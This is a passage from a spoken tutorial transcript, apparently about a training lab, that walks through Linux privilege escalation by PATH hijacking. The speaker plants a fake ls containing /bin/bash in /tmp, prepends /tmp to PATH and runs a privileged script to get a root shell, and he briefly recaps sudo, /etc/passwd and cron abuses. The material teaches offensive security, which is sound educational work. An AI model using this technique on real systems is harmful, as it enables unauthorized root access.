root. In this case here, we're going to be exploiting something called path. Now, path is an environmental variable, say that right, in Linux and Unix-like operation systems that specifies directories that would hold specific executable programs. So whenever you type in any type of command that you're running, ls or id or whatever, any command in the terminal, it searches for the executable file for that. For instance, if I did ls, in this case here, it would find it, it's pulling it from a particular path. Now, in order to see the paths that you have, you would do echo, and then you would do a $, all capital letter path, like that. And there you go. So these are all the different paths you can see separated by colons here, that any executables can be found here, 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 right? All these different ones that are listed here. Okay, we're going to try to take advantage of that by making something they call an imitation one to be able to hopefully bypass and get root. All right, so first off, let's go ahead and let's navigate to the home of user 5. And let's do an ls. All right, so we have a script executable here. So if I were to run this, I'll do /script. All right, so when I do /script, it looks like it's running the ls command, okay? Now, the reason I say that is because if I do ls, it's the same output. So we can assume, in this case, that this is running ls. If it were to print the host name, I would assume it's running either who am I or something to that effect. So in this case, we know it's running ls. So what we're going to try to do is make an imitation version of ls and see if we can stuff that in the environment variable and get ls to run our whatever it may be, a bash shell as root, those sort of things. So what we're going to do is we're going to navigate over to a temp directory. Okay. Now in Linux, the temp directory is where a lot of attackers will go to download different exploits, C files, and do a GCC and compile scripts and exploit scripts from there, things like that. And they'll typically go to the temp file to be able to do it. And you'll notice that the temp location is not one of the paths here, right? So our goal in this case here is we're going to go ahead and echo. And echo means take whatever I'm typing here and echo it onto the screen or echo it into a file. If I did a bracket to the right, single bracket, it basically means put that into a file called ls, whatever I'm typing in for this command. So if I say echo : /bin/bash, okay, like that, and I say bracket to the right, ls, I'm basically saying take bin, the words bin bash, stuff it into a file called ls. So I'm going to go ahead and do that, and it's basically saying make bin bash ls. If I run ls, I'm running bash. That's what we're trying to do. So once we've done that, we also now need to make that executable, because if we did, well, we can't do ls unless we did the bin version of it. But anyways, currently it doesn't have executable. So we'll say chmod, if you remember that from before. Last time we did a 777 across the board. In this case, we're actually going to just add executable to this particular file. That's it. So we're going to say +x, just like that. And we'll say ls. So chmod, the permission you want to give, and then the name of the file that you want to assign this permission to, like that. So now in temp, we have a file that's executable called ls, that when you run ls, it will give us a root bin bash shell. See? Now what we have to do is we have to actually put this as a path in the environment variables. To do that, you do the command export path and make sure case sensitivity is important. We'll say add this path to the environment variables. And we'll say /temp. Okay, and we'll do a colon. It's a particular syntax for it, so this is what it would look like, just like that. Okay, so we're saying export the path of /temp and put it as a path in our environment variable. So now if we were to go ahead and do our echo path, there we go, you can see right here at the very beginning, temp. So we're hoping it'll hit that first, not the bin /bin, which would be this one, where ls is located, I believe. It won't hit that one. We're hoping that it hits this one. Okay, so now let's go ahead back to our home of user 5. And we know from running previously, whoops. I did, so in other words, in this case, because we had ls as an executable one, what we want to do, if we actually really want to run ls on this directory, we have to actually specify the absolute path. So in this case, if I said /bin/ls, that's where it will list it. So essentially, we know that this script, this executable, is hard-coded to run ls whenever I run script. And we're hoping it runs the ls I made, not the original one. So let's do that. So /script, which in this case will run our ls, hopefully. Boom, hit that, and pop, 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 another 7 drop. Pretty awesome. So right there we have root access. So you can see there's quite a number of different ways that you can get privilege escalation on these Linux machines. And it's a pretty awesome page here that this person created for this room. And they give you a lot of good information down at the bottom as well, some different links and things like that. But I will also write up something as well and put it on my website specifically for that, and I'll probably attach it here to the description of the video. But that is essentially Linux privilege escalation. So when we do other videos in the series and I break into a machine and we exploit Sudo to be able to get root access, you can reference back to this to understand, okay, what exactly is going on here? Well, it's that Sudo bit that we set for permission, or any of the ones that we actually had here. So you can see, as a quick rundown, we did the Sudo, we abused that. We did the writable etc passwd, sudo for the vi editor, we messed around with cron tab, and then lastly we did the path variable. So I hope you enjoyed that video and that was informative. We're going to be doing a lot more series in here and just taking any cool different machines that are out there that I think has some good worth to teach stuff, and we'll just kind of open them up and we'll pop, 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 another server drop, we'll blast that box, and then we'll discuss what's going on, why did it happen, what are the ins and outs of it and stuff. So please go ahead and subscribe to the channel for more of these videos if you want to be notified whenever I put some new ones out here. And like I said, we're going to do a whole series of this stuff, so I hope you enjoy it. All right, have a good day.